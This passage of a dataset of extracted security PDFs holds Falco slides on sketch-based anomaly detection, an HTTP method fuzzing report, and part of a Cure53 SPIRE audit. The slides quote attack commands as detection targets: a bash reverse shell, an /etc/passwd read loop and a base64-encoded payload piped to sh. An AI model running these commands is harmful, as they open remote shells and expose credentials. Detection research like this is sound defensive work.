Process/Thread Cache\npid = Linux process identifier \nppid = Linux parent process identifierThe Falco Project\npidppid\u2026Process/Thread n\npidppid\u2026Process/Thread n\npidppid\u2026Process/Thread nPurge Process/Thread on exit\nLinux Kernel View Mirror: Falco\u2019s Process/Thread Cache\npid = Linux process identifier \nppid = Linux parent process identifierpidppid\u2026Process/Thread n\nThe Falco Project\npidppid\u2026Process/Thread n\npidppid\u2026Process/Thread n\nBroken LinksLinux Kernel View Mirror: Falco\u2019s Process/Thread Cache\npid = Linux process identifier \nppid = Linux parent process identifierWhat can we detect with the right Falco rules /questionmark\nRemote Code \nExecutionThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nSecrets Lifting\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nPrivilege \nEscalation\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nSandbox Escape\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nLateral \nMovement\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nUnauthorized \nAccess\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\ndetect known \ninfrastructure \nattacksThe Falco Project\nWhat does doing nothing cost you /questionmarkRaising the Bar \nSelf-T agging of Normal App BehaviorTune your rules, or be tuned out \u2026\nTune your rules, or be tuned out \u2026\n$ echo \u201cdetect abnormal file opens\u201d \n$ ./demo1Tune your rules, or be tuned out \u2026\nself-tagging \nnormal application \nbehavior\nInformation AsymmetryInformation Asymmetry\nTo Defenders Advantagevaluable \ninformation \nencoding\nMore information, more possibilitiesMore information, more possibilities\nDetect unusual file opens to find Arbitrary \nFile Reads -- an entire family of attacks. \nWe can quantify \"unusual\" as less common \nin the application's context because we \ncan access and encode more information \nefficiently and compactly.\nRule-based detections focus on what we think \nattackers will do, not on what they are doing/questionmark\n\u2026because \u201cfound data\u201d is not enough\u2026\u2026need relevant , structured , and \ncontextual data to detect today's \ncyber attacks\u2026\u2026 defining the \u201cright data\u201d \nproves to be challenging\u2026\n\u2026speeding up the novelty discovery \nand adaptation cycle will be very helpful/questionmark\nStaying ahead in Linux runtime \nmonitoring and detecting cyber \nattacks is hard \u2026\nAttackers don\u2019t play by rulesdetect what we \ndon\u2019t know\nAttackers don\u2019t play by rulesRaising the Bar\nvaluable \ninformation \nencoding\ndetect what we \ndon\u2019t knowSelf-tagging \nnormal app \nbehavior\ndetect known \ninfrastructure \nattacksA Peek into the Work In Progress for Falco\nThe Falco Project\nhttps://github.com/falcosecurity/libs/pull/1453\nwip: new(userspace/libsinsp): MVP CountMinSketch Powered Probabilistic Counting and FilteringAdvanced kernel event data analytics that's \nbuilt for the real world, not the award shelfAnalyze behaviors outside the past behavior\u2026 process attributes \u2026\u2026 process attributes \u2026\n\u2026 unusual app process attributes \u2026Data Compression Requirements\nMinimum accuracy guarantees \u2014 performance more important \nData Structure w/ efficient time and space complexity \nCounters of 64bit, ideally just 32bit \nUse established algorithms proven to be useful in real-life production \nSupport different data types (strings, numeric numbers, bool\u2026) CountMinSketch - Fixed space data structure\nWidth = w buckets (NUMBUCKETS)Depth = d Hash Functions\nBias\nw = ceil(e / /epsilon.grek) -> where e is the base of the natural logarithm, /epsilon.grek is the desired error rated = ceil(ln(1/ /delta.grek)) -> /delta.grek is the desired probability of failureCountMinSketch - Update counts\nmatrix[d][hash%NUMBUCKETS]++New itemWidth = w buckets (NUMBUCKETS)CountMinSketch - Get count estimates\nGet the min value (point query)Width = w buckets (NUMBUCKETS)\nk heavy hitters \nor \nsimple thresholdsCountMinSketch - Decisions\nIn runtime Threat Detection approx knowing recurring high volume patterns is a huge win /exclamationmarkNo undercounting - prone to overcounting - perfect for heavy hitters detection in skewed distributions\nk heavy hitters \nor \nsimple thresholdsCountMinSketch - T ake Away\n> Less Memory \n> Fixed Memory\n> Overcounting within error \n> Safety boundary\n> Won\u2019t blow up in productionCountMinSketch - How To Runtime Threat Detection\nOne shared set of sketches per host\nSketch 1\nSketch 2Sketch n\n\u2026\u2026/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh\n/bin/sh/questionmark\n/questionmark/bin/bashNetwork \nConnect \nEvent/usr/bin/python2.7/bin/uname\nREVERSE SHELL\n/bin/sh\n/tmp/Qhhg/bin/shWhat are we counting /questionmarkproc.args: \nNot always available. \nMore challenging to model due to noise. \nGreater numbers of arguments and \nhigher average counts provide more \ninformation and context from the \narguments. Reflective of a compressed encoding \nof the context of a process. \nOptional inclusion of file paths or \nnetwork connection tuples for high-\npriority use cases related to file \ndescriptor actions. CountMinSketch - How To Runtime Threat Detection\ncontainer.id \nproc.name \nproc.exepath \nproc.tty \nproc.vpgid.name \nproc.sname \nproc.pname \nproc.aname[2] \nproc.aname[3] \nproc.aname[4] fd.namecontainer.id \nproc.args attacker command (typed into terminal) command line (process name + cmd args)bash -i >& /dev/tcp//1337 0>&1 bash -iecho \"string\"while read -r line; do echo \"$line\"; done < /etc/\npasswd;ALL_PROXY=socks5://127.0.0.1:9999 curl https://\n curl https://echo \n'cHl0aG9uIC1jICJleGVjKGFXMXdiM0owSUc5ekxITnpiQW89L\nmRlY29kZShiYXNlNjQpKSIgPi9k \nZXYvbnVsbCAyPiYxICYK' | base64 \u2014decode | sh(1) sh \n(2) base64 \u2014decode \n(3) python -c \nexec(\u2018aW1wb3J0IG9zLHNzbAo='.decode('base64'))Shell Input Encoding Challenge- rule: Abnormal File Open \n condition: > \n open_read \n and fd.sketch0.count < threshold1 CountMinSketch Powered Falco Rules\n and proc.sketch2.count < threshold2) Process context + fd.name countsSketch 0proc.args count summary statsSketch 1$ echo \u201cdetect command injection\u201d \n$ ./demo2More information, more possibilitiesProposal \u0e4fProjects best interest \n\u0e4fSolve a relevant and \nbroad set of problems \nin Falco \n\u0e4fDesign \n\u0e4fEarly POCDevelopment\u0e4fStart development \n\u0e4fIncorporate early \nfeedback \n\u0e4fCreate test suites to \nbuild trust and \nshowcase benefitsExperimental Release\u0e4fExpose new \ncapabilities to early \nadopters \n\u0e4fRevise and/or expand \ncapabilities \n\u0e4fThe new framework \nshould be extensible \nby the communityOfficially Supported\u0e4fIf this stage is reached, it \nmeans that the community \nhas deemed the new \nfeature useful \n\u0e4fNew feature meets strict \nproduction requirements \nwith a reasonable \nperformance-accuracy \ntrade-offHow to go about contributing to OSS Falco /questionmark> Learning \n> Learn normal high-frequency application behavior \n> Access more information on the host to define behavior \n> Increase the chances of detecting unknown attacks\n> Velocity & Scalability \n> Adaptation and novelty discovery \n> Automated traditional tuning\n> Reduce Cost \n> Avoid infeasible compute in data lakes\nSummaryQ&A\n" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 2 2021-04-16 11_51_01.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 2\nin 164.90.157.161-withUsernamePassword/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-16 11:51:01\nTime taken 00:00:07.634\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response: \nError
Cannot PURGE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot COPY /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n \nError
Cannot UNLOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot LOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n \nError
Cannot PROPFIND /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n \nError
Cannot PATCH /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n \nError
Cannot TRACE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n \nError
Cannot DELETE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n \nError
Cannot PUT /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot POST /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Key Management", - "project_name": "SPIRE", - "file_name": "cure53-report.pdf" - }, - "content": [ - { - "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nSecurity-Review Report SPIRE 01-02.2021\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. R. Peraglie, MSc. N. Krein\nIndex\nIntroduction\nScope\nTest Methodology\nPhase 1: General security posture checks\nPhase 2: Manual code audits and penetration tests\nPhase 1: General security posture checks\nApplication/Service/Project Specifics\nLanguage Specifics\nExternal Libraries & Frameworks\nConfiguration Concerns\nAccess Control\nLogging/Monitoring\nUnit/Regression and Fuzz-Testing\nDocumentation\nOrganization/Team/Infrastructure Specifics\nSecurity Contact\nSecurity Fix Handling\nBug Bounty\nBug Tracking & Review Process\nEvaluating the Overall Posture\nPhase 2: Manual code auditing & pentesting\nIdentified Vulnerabilities\nSPI-01-003 WP2: Path normalization in Spiffe ID allows impersonation (Medium)\nSPI-01-004 WP2: Server impersonation through legacy node API (High)\nSPI-01-006 WP1: File-descriptor leak inside Linux peertracker (Medium)\nMiscellaneous Issues\nSPI-01-001 WP1: Build-system lacks security flags (Low)\nCure53, Berlin \u00b7 02/10/21 1/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nSPI-01-002 WP1: SPIRE server stores private key.json world-accessible (Medium)\nSPI-01-005 WP1: SPIRE links against outdated third-party modules (Medium)\nSPI-01-007 WP1: Path traversal in Spiffe ID via potentially unsafe join token (Info)\nSPI-01-008 WP1: Anti-SSRF hardening not applied for SDS API (Info)\nConclusions\nIntroduction\n\u201cSPIRE (the SPIFFE Runtime Environment) is a toolchain of APIs for establishing trust\nbetween software systems across a wide variety of hosting platforms. SPIRE exposes\nthe SPIFFE Workload API, which can attest running software systems and issue\nSPIFFE IDs and SVIDs to them. This in turn allows two workloads to establish trust\nbetween each other, for example by establishing an mTLS connection or by signing and\nverifying a JWT token. SPIRE can also enable workloads to securely authenticate to a\nsecret store, a database, or a cloud provider service.\u201d\nFrom https://github.com/spiffe/spire\nThis report describes the results of a security-centered assessment of the SPIRE\ncomplex. Carried out by Cure53 at the beginning of 2021, the project included a\npenetration test, a source code audit, as well as a broader security posture check of the\nSPIRE software compound.\nIt should be clarified that SPIRE, a.k.a. the SPIFFE Runtime Environment, is a toolchain\nof APIs for establishing trust between software systems across a wide variety of hosting\nplatforms. The work detailed here was requested by the Cloud Native Computing\nFoundation (CNCF) in late 2020 and carried out by Cure53 in the second half of January\n2021. A total of thirty-two days were invested into the project, given the objectives and\nexpected coverage.\nTo respond to the priorities set by CNCF/SPIRE, three work packages (WPs) were\ndelineated. In WP1, Cure53 reviewed the security posture of the SPIRE project more\nbroadly, moving on to source code audit of the SPIRE code base in WP2. Finally, a\npenetration test against SPIRE deployment was executed in WP3. Notably, this structure\nof the WPs, which go beyond standard pentesting and auditing and extend to checking\nthe general perimeter, typically characterized CNCF-related work.\nCure53, Berlin \u00b7 02/10/21 2/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nWhite-box methods were used in this project, given that the source code is publicly\navailable as an OSS project. More generally, the approach is consistent with CNCF-\ncommissioned projects that Cure53 has been involved in. Furthermore, Cure53 had\naccess to a pre-configured environment set up by the SPIFFE team. Said deployment\noffered a production-like test-surface for Cure53 to work with.\nAll preparations were done on time in January 2021, namely in CW02 and CW03.\nConsequently, Cure53 could have a smooth start without any roadblocks in CW04.\nCommunications during the test were done using a channel on the SPIFFE Slack\nworkspace. Members of the Cure53 team participating in this assignment could join the\ndiscussions and keep the SPIRE/SPIFFE team appraised of new developments in the\ntest. Besides frequent status, live-reporting was done so that the SPIFFE team could\naddress all findings pertinent to SPIRE as quickly as possible.\nOverall, the SPIFFE team did a fantastic job in making things available and accessible\nfor the test. In connection to this, Cure53 achieved a very good coverage of the test-\ntargets across WP1-WP3 in the time-frame available for this exercise. Eight security-\nrelevant discoveries were made. Three items were classified to be security\nvulnerabilities and five belong to a broader array of general weaknesses with lower\nexploitation potential. Note that one of the findings was ranked as a High-level risk; other\nissues - beyond two Medium-level threats - did not call for immediate action or\nremediation. It can be argued that the evidence indicates a rather praiseworthy result for\nSPIRE. \nIn the following sections, the report will first shed light on the scope and key test\nparameters, as well as the structure and content of the WPs. In order to maximize gains\nfrom the project, Cure53 then offers a series of methodology and coverage chapters, so\nas to highlight what has been done and with which results, especially in the area of\nsecurity posture checks. Next, all findings will be discussed in grouped vulnerability and\nmiscellaneous categories, then following a chronological order in each grouping.\nAlongside technical descriptions, PoC and mitigation advice are supplied when\napplicable. Finally, the report will close with broader conclusions about this January\n2021 project. Cure53 elaborates on the general impressions and reiterates the verdict\nbased on the testing team\u2019s observations and collected evidence. Tailored hardening\nrecommendations for the SPIRE complex are also incorporated into the final section.\nCure53, Berlin \u00b7 02/10/21 3/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nScope\n\u2022Penetration Tests & Security Reviews against SPIRE\n\u25e6WP1: Security posture of the SPIRE project\n\u25e6WP2: Source code audit of SPIRE\n\u25aaMain focus https://github.com/spiffe/spire/releases/tag/v0.12.0\n\u25aaMisc focus https://github.com/spiffe/go-spiffe/releases/tag/v2.0.0-beta.4\n\u25e6WP3: Penetration test against the SPIRE deployment\n\u25aa34.214.21.89 granola-global # Root Server\n\u25aa54.149.236.250 granola-regional-1 # Nested Server\n\u25aa54.184.34.192 granola-workload # Agent / Workload\n\u25aa18.223.247.8 acme-regional # Agent / Workload\n\u25aa3.131.153.201 acme-workload # Standalone Server\n\u25aa34.220.90.50 granola-regional-2 # Nested Server\nCure53, Berlin \u00b7 02/10/21 4/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nTest Methodology\nThis section zooms in on the metrics and methodologies used to evaluate security\ncharacteristics of the SPIRE project and codebase. In addition, it includes results\npertinent to individual areas of the project\u2019s security properties that were either selected\nby Cure53 or singled out by other involved parties as calling for a closer inspection.\nSimilarly to previous tests for CNCF, this assignment was also divided into two phases.\nThe general security posture and maturity of the audited codebase of SPIRE has been\nexamined in Phase 1. The usage of external dependencies has been audited, security\nconstraints for SPIRE configurations were examined and the documentation had been\nstudied in depth in order to get a general idea of security awareness\u2019 levels at SPIRE.\nThis was followed by research into how security reports and vulnerabilities are handled\nand whether a healthily secure infrastructure is seen as a serious matter. The latter\nphase covered actual tests and audits against the SPIRE codebase, with the code\nquality and its hardening evaluated.\nPhase 1: General security posture checks\nBecause SPIRE is a relatively complex software architecture, Cure53 was pleased to\nsee extensive documentation and additional material, such as the provided Security\nSelf-Assessment. This greatly helped with Phase 1 of this project in which the general\nsecurity posture and overall code quality of the SPIRE project was inspected from a\nhigh-level perspective.\nThis encompasses also the management processes such as the handling of vulnerability\ndisclosures, threat modeling approaches and general measures for code hardening. All\nthis gives a meta-level perception of the maturity and robustness that is not solely bound\nto the code quality itself.\nPhase 2: Manual code audits and penetration tests\nIn this Phase, Cure53 conducted an extensive source code analysis across the different\ncomponents of the SPIRE software stack. Since SPIRE has well-defined attacker\nmodels containing risk-assessments, it is quite clear what issues to look out for and what\nto concentrate on. As such, identification of security-relevant areas of the project's code\nbase was close-to-unnecessary and, in effect, Cure53 could quickly start with targeted\naudits on sensitive parts of the system.\nCure53, Berlin \u00b7 02/10/21 5/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nThis also underlines the well-thought-out development process and self-reflection of the\ndevelopers that have the attacker's perspective in mind. While Cure53's goal was to\nreach good coverage across the scope, such large-scale audits are always limited by the\nbudget and require a more isolated focus on the particularly sensitive parts of the code.\nConsequently, this phase also determines which parts of the project's scope deserve\nmore focus in future audits.\nLater chapters and especially the findings in the Identified Vulnerabilities and the\nMiscellaneous Issues sections of this report highlight issues that were found during this\naudit. Their implications for the SPIRE software complex are discussed there.\nPhase 1: General security posture checks\nThis Phase is meant to provide a more detailed overview of the SPIRE project\u2019s security\nproperties that are seen as somewhat separate from both the code and the SPIRE\nsoftware. The first few subsections of the posture audit focus on more abstract\ncomponents instead of judging the code quality itself.\nLater subsections look at elements that are linked more strongly to the organizational\nand team aspects of SPIRE. In addition to the items presented below, the Cure53 team\nalso focused on tasks that fostered a cross-comparative analysis of all observations.\n\u2022The documentation was examined to understand all provided functionality and\nacquire examples of what a real-world deployment of SPIRE could look like.\n\u2022The extensive architectural design documentation as well as several parts of the\nself-security assessments were reviewed.\n\u2022The network topology and connected parts of the overall architecture were\nexamined. This also included consideration of relevant configurations that are\nnecessary to deploy SPIRE. Some potential weaknesses were already spotted\nthere and are highlighted in the Configuration Concerns section of this report.\n\u2022The given code-base was reviewed for structural design, documentation and\ncomments. High-level code audits and common pitfalls in the Go programming\nlanguage were looked out for. For example, general issues such as incorrect\nusage of the unsafe keyword can quickly be enumerated.\n\u2022Code issue reports from gosec were studied to check if there are any remaining\nlow-hanging fruit inside that simply have been overlooked during the codebase\ndevelopment.\n\u2022External libraries and frameworks that are referenced in the code were studied\nand checked to make sure they do not contain any publicly known vulnerabilities.\nAs highlighted in the External Libraries & Frameworks and the connected finding\nunder SPI-01-005, Cure53 proposed some improvements.\nCure53, Berlin \u00b7 02/10/21 6/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \n\u2022Normally, past vulnerability reports for SPIRE would have been checked out to\nspot further interesting areas and generally monitor the disclosure process, yet\nSPIRE has not received impactful vulnerability reports thus far.\n\u2022The security posture checks phase is concluded with an analysis of\norganizational specifics, such as making sure there are good guidelines for\nsecurity contacts. Soundness of the bug tracking and review process was also\nverified.\n\u2022Drawing on the evidence from the steps above, the project\u2019s maturity was\nevaluated; specific questions about the software were compiled from a general\ncatalogue according to applicability.\nApplication/Service/Project Specifics\nIn this section, Cure53 will share insights on the application-specific aspects which lead\nto a good security posture. These include the choice of programming language,\nselection and oversight of external third-party libraries, as well as other technical aspects\nlike logging, monitoring, test coverage and access control.\nLanguage Specifics\nProgramming languages can provide functions that pose an inherent security risk and\ntheir use is either deprecated or discouraged. For example, strcpy() in C has led to many\nsecurity issues in the past and should be avoided altogether. Another example would be\nthe manual construction of SQL queries versus the usage of prepared statements. The\nchoice of language and enforcing the usage of proper API functions are, therefore,\ncrucial for the overall security of the project.\nSince SPIRE seamlessly integrates with software such as Envoy and can be built on top\nof Kubernetes clusters, it comes as no surprise that Go has been chosen as a\nprogramming language. Go has proven to offer higher levels of memory safety\ncompared to other languages that compile to native code. It is quite rare to spot direct\nmemory safety issues that other languages such as C and C++ suffer from.\nIssues like buffer overflows, type confusions or Use-After-Free vulnerabilities are directly\ntaken care of by Go\u2019s internal memory management system. The compiler equally\nmakes sure that memory bounds are automatically verified by placing checkpoints into\nthe generated assembly. Although it is still possible to write unsafe Go code, SPIRE\ncompletely refrains from doing so.\nWhile memory safety issues are of lesser concern in software stacks that build on Go,\nCure53 still focused on shortcomings represented by integer overflows and race\nconditions through incorrectly placed mutexes. Although Go\u2019s garbage collector is the\nCure53, Berlin \u00b7 02/10/21 7/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nsaving grace in many situations that lead to Denial-of-Service, leaky memory stemming\nfrom open file descriptors can signify threats in the form of bugs or input validation\nissues.\nExternal Libraries & Frameworks\nExternal libraries and frameworks can also contain vulnerabilities but their benefits\noutweigh the possible risks. Relying on sophisticated libraries is advised instead of\nreinventing the wheel with every project. This is especially true for cryptographic\nimplementations, which are known to be prone to errors.\nSPIRE mostly imports well-tested crypto packages of the Go language framework. This\nincludes crypto/rand, crypto/tls or crypto/x509. For transport mechanisms and the\ndifferent APIs, SPIRE mainly uses google.golang.org/grpc derived from protobufs\n(github.com/golang/protobuf ). While some of the direct dependencies are mostly up to\ndate, Cure53 noticed a significant list of outdated modules that are linked in the master\nbranch of spiffe/spire. This is additionally documented as a miscellaneous finding in SPI-\n01-005. Only one outdated module was found to be suffering from a security vulnerability\nbut it should generally be considered to tidy up the dependency list. This generally\nprevents shipping a product that includes vulnerable modules which are actually\nmitigated in more recent versions.\nWith a significant number of third-party modules, dependency tracking and vulnerability\nchecking becomes no easy task. Consequently, it is recommended to automate this\nprocess and have a build-system that takes major version changes for third-party\nmodules into consideration. For software written in Go, Cure53 had good experience\nwith go-mod-outdated1, which lists version changes for direct dependencies. Other hand\ntools like OWASP Dependency-Check2 work with any language and pull additional data\nfrom the NIST National Vulnerability Database3. This additionally helps in finding\noutdated modules affected by issues and requiring immediate attention/ mitigation.\nConfiguration Concerns\nComplex and adaptable software systems usually have many variable options which can\nbe configured accordingly to what the actually deployed application necessitates. While\nthis is a very flexible approach, it also leaves immense room for mistakes. As such, it\noften creates the need for additional and detailed documentation, in particular when it\ncomes to security.\n1https://github.com/psampaz/go-mod-outdated 2https://owasp.org/www-project-dependency-check/ 3https://nvd.nist.gov/vuln/data-feeds \nCure53, Berlin \u00b7 02/10/21 8/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nThe attested agent path for many built-in node attestor plugins may be a risk due to\nuser-input embedded within the attested agent path, as seen in SPI-01-003 and SPI-01-\n007. It is advised to consider this threat in the security section of the documentation.\nAt the same time, SPIRE APIs could be configured to be exposed via TCP instead of a\nunix domain socket. However, this configuration is discouraged by the documentation for\nthe Agents Workload API. The same applies to turning off the TLS verification within go-\nspiffe/v2, which is also highly discouraged by SPIRE documentation.\nConfigured workload and node attestor plugins could become a risk as they contain\ncritical and potentially vulnerable code that could allow attackers to impersonate agents\nand workloads. If SPIFFE Federation is configured with an untrusted bundle endpoint,\npoisoning the root of the certificate chain could be accomplished.\nAccess Control\nEvery access to SPIRE server that could potentially do harm or extract sensitive\ninformation is primarily controlled via SSL client authentication and the local socket type.\nThe SSL verification is outsourced to Go\u2019s built-in crypto/tls module and provides the\ncertificate authority specified by the user. The authorization code is redundant in modern\nAPI and legacy API in such that the validations and checks performed are the same.\nTherefore, it is recommended to remove the old legacy node and entry registration APIs\nthe code base to minimize redundancy.\nThe authorization logic distinguishes a total of five user-roles: unauthenticated, agent,\nlocal, admin and other downstream servers. The local role will be assigned to peers that\nconnect locally via the unix domain socket. All other roles will be determined by the\npresence of a valid client certificate and the associated Spiffe ID extracted from the\ncertificate. Every gRPC method provided by the server was explicitly assigned a set of\nallowed user-roles required for invocation. Validated information relevant for\nauthorization is stored in a context persistently passed to all handlers.\nAccess Control on the Agents Workload API is primarily done physically by only\nexposing the Workload and Secret Service Discovery API over a unix domain socket. It\nrequires workloads to obtain file-access to the UDS file. Additionally, a mandatory\nsecurity metadata key must be added to every request to the Workload API. This can\nmitigate the impact of potential SSRF vulnerabilities in the network if access was indeed\ngiven via TCP (which is discouraged in most scenarios by the documentation).\nCure53, Berlin \u00b7 02/10/21 9/27 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14\n D 10709 Berlin\n cure53.de \u00b7 mario@cure53.de \nLogging/Monitoring\nHaving a good logging/monitoring system in place allows developers and users to\nidentify potential issues more easily or get an idea of what might be going wrong. It can\nalso provide security-relevant information, for example when a verification of a signature\nfails. Consequently, having such a system in place has a positive influence on the\nproject.\nOn the one hand the SPIRE agents and the SPIRE server offer centralized logging via\nthe log_file flag of the corresponding configuration files with extra levels for verbosity.\nThis default setting here, however, is set to logging to STDOUT only, which should be\ntreated as suboptimal. Default logging to one of the standard /var/log directories should\nbe considered here.\nOn the other hand, both agents and servers allow exporting of metrics to external\ncollectors such as Datadog, M3, Prometheus and StatsD. This can be configured\nthrough the server.conf and agent.conf, respectively. SPIRE offers a wide range of\ntelemetric data to be transferred; all are explained through dedicated documentation4.\nUnit/Regression and Fuzz-Testing\nWhile tests are essential for any project, their importance grows with the scale of the\nendeavor. Especially for large-scale compounds, testing ensures that functionality is not\nbroken by code changes. Furthermore, it generally facilitates the premise where features\nfunction the way they are supposed to. Regression tests also help guarantee that\npreviously disclosed vulnerabilities do not get reintroduced into the codebase. Testing is\ntherefore essential for the overall security of the project.\nSPIRE extensively incorporates unit-tests in nearly all of their modules, giving a\ncomprehensive test coverage across the complete codebase. While walking through the\ncommit log, Cure53 also noticed test-cases for regressions that happened in the past,\nlike for bugs such as for #18635 or smaller DoS security issues, e.g., #5776. Especially\nthorough testing is included for highly-sensitive code paths 